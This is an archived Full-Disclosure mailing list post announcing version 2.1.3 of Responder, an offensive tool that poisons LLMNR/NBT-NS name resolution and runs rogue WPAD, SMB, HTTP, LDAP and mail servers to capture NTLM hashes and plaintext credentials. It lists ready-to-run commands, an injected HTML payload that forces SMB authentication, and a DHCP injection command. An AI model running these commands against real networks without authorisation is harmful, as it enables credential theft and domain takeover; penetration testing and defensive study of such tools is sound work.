lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAG_zyZ_dZgs6xUQuComRoTaGWJC5v0MG=2yCxWoOOWO=GhaVHg@mail.gmail.com> Date: Fri, 28 Nov 2014 01:31:00 -0500 From: laurent gaffie <laurent.gaffie@...il.com> To: fulldisclosure@...lists.org Subject: [FD] [Tool] Responder v2.1.3 Responder is an Active Directory/Windows environment takeover tool suite that can stealthily take over any default Active Directory environment (including Windows 2012R2). Most of the attacks in this tool are hard to detect and are highly successful. This version includes several enhancements: - Analyze Mode: Figure out what kind of network you're dealing with before doing anything: - Map all workstations, domain forests, SQL servers within maximum 12 minutes, no user interaction; The Lanman module will query any hosts who sent a Domain Master Browser announcement on the subnet to extract that domain computer list and additional forests ( https://support.microsoft.com/KB/188001 -> "Only the PDC can be a domain master browser"). - Figure out right away if you can use ICMP Redirect on that subnet automatically. - Figure out what's going on on this network; Is there a NAC/IPS/etc trying to detect NBT-NS/LLMNR poisoning by sending random unexistant names? - Allows a client/sysadmin to see if remediation was done properly. - WPAD module; Choose if you want to intercept/inject traffic, get NTLMv1/2 hashes transparently or get a plain text sets of credentials. This module is highly effecive and will gather any workstations sets of credentials on a default environment with no user interaction (unless if you're using -b for plaintext credentials). - Kerberos server. Grab Kerberos AS-REQ Pre-Auth type 23 hashes (hashcat -m 7500). - In-scope names or IPs to respond to (LLMNR/NBT-NS). - Names or IPs (LLMNR/NBT-NS) you don't want to respond to (detected NAC/IPS, out of scope multicast LLMNR, etc). - Find MSSQL servers with the MSSQL Browser Service, one packet. - Rogue servers included: - SMB NTLMv1/2, Clear text passwords for NT4, and LM hashing downgrade when the --lm option is set. - MSSQL Auth server supports NTLMv1, LMv2 hashes and MSSQL plaintext auth. - HTTP Auth server NTLMv1/2 and basic. - HTTPS NTLMv1/2 and basic auth. - LDAP NTLMv1/2 and plaintest auth. - FTP clear text credentials. - POP3 clear text credentials. - SMTP clear text credentials. - IMAP clear text credentials. Usage example: ./Responder.py -i YourIP -A --> -A Analyze Mode, be a ninja; Port scanning is for losers. ./Responder.py -i YourIP -rFv --> -r use workstation redirector for NBT-NS --> -F force auth on wpad.dat files retrieval (highly efficient) --> -v be verbose, print all queries. ./Responder.py -i YourIP -rw --> -w enable WPAD server, grab requests and try to inject a custom html payload into the HTML page sent to the victim. Default HTML is: "<html><head></head><body><img src='file:\\\\\RespProxySrv\ssed\seyad.ico' alt='Loading' height='1' width='2'></body></html>". If nothing is specified in Responder.conf under "HTMLToServe" then nothing will be injected. r ./FindSQLSrv.py --> Map MSSQL servers on your subnet, one packet. ./DHCP.py -I eth0 -i 10.20.30.40 -d pwned.com -p 10.20.30.40 -s 10.20.30.1 -r 10.20.40.1 ##DHCP INFORM## --> -i Yourip --> -d Domain to inject --> -p Primary domain to inject --> -s Secondary domain to inject --> -r Gateway/Router to inject ##/DHCP INFORM## --> (Optional -R) Respond to DHCP Requests, inject Linux/Windows clients usually faster than the actual DHCP server. Use this in conjunction with Responder's DNS server or Pcredz ( https://github.com/lgandx/PCredz) Github: https://github.com/Spiderlabs/Responder Twitter for the latest updates: https://twitter.com/PythonResponder _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists